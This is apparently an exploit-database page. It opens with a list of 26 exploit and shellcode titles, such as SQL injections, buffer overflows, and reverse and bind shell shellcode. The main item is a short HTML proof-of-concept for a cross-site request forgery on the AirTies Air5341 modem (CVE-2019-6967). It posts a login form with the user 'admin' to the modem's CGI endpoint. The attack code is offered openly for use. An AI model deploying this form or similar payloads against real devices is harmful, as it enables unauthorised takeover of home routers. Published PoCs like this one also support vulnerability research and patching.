
26 changes to exploits/shellcodes Sricam gSOAP 2.8 - Denial of Service Smart VPN 1.1.3.0 - Denial of Service (PoC) MySQL User-Defined (Linux) x32 / x86_64 - sys_exec Function Local Privilege Escalation Easy Video to iPod Converter 1.6.20 - Buffer Overflow (SEH) R 3.4.4 XP SP3 - Buffer Overflow (Non SEH) BEWARD Intercom 2.3.1 - Credentials Disclosure Faleemi Desktop Software 1.8 - Local Buffer Overflow (SEH)(DEP Bypass) CloudMe Sync 1.11.2 Buffer Overflow - WoW64 - (DEP Bypass) Rundeck Community Edition < 3.0.13 - Persistent Cross-Site Scripting WordPress Plugin Ad Manager WD 1.0.11 - Arbitrary File Download AirTies Air5341 Modem 1.0.0.12 - Cross-Site Request Forgery LogonBox Limited / Hypersocket Nervepoint Access Manager - Unauthenticated Insecure Direct Object Reference CMSsite 1.0 - 'cat_id' SQL Injection CMSsite 1.0 - 'search' SQL Injection Cisco RV300 / RV320 - Information Disclosure Cisco Firepower Management Center 6.2.2.2 / 6.2.3 - Cross-Site Scripting Newsbull Haber Script 1.0.0 - 'search' SQL Injection Care2x 2.7 (HIS) Hospital Information System - Multiple SQL Injection Teameyo Project Management System 1.0 - SQL Injection Mess Management System 1.0 - SQL Injection MyBB IP History Logs Plugin 1.0.2 - Cross-Site Scripting ResourceSpace 8.6 - 'collection_edit.php' SQL Injection Linux/x86 - exit(0) Shellcode (5 bytes) Linux/x86 - Read /etc/passwd Shellcode (58 Bytes) (2) Linux/ARM - Reverse TCP (/bin/sh) - 192.168.1.124:4321 Shellcode (64 bytes) Linux/ARM - Bind TCP (/bin/sh)-0.0.0.0:4321 Null Free Shellcode (84 bytes)
20 lines
No EOL
821 B
HTML
20 lines
No EOL
821 B
HTML
# Exploit Title: AirTies Air5341 1.0.0.12 Modem CSRF Exploit & PoC
|
|
# Version: AirTies Modem Firmware 1.0.0.12
|
|
# Tested on: Windows 10 x64
|
|
# CVE : CVE-2019-6967
|
|
# Author : Ali Can Gönüllü
|
|
|
|
<html>
|
|
<form method="POST" name="formlogin" action="
|
|
http://192.168.2.1/cgi-bin/login" target="_top" id="uiPostForm">
|
|
<input type="hidden" id="redirect" name="redirect">
|
|
<input type="hidden" id="self" name="self">
|
|
<input name="user" type="text" id="uiPostGetPage" value="admin"
|
|
size="">
|
|
<input name="password" type="password" id="uiPostPassword" size="">
|
|
<input onclick="uiDologin();" name="gonder" type="submit"
|
|
class="buton_text" id="__ML_ok" value="TAMAM"
|
|
style="background-image:url(images/buton_bg2.gif); height:21px;
|
|
width:110px; border: 0pt none">
|
|
</form>
|
|
</html> |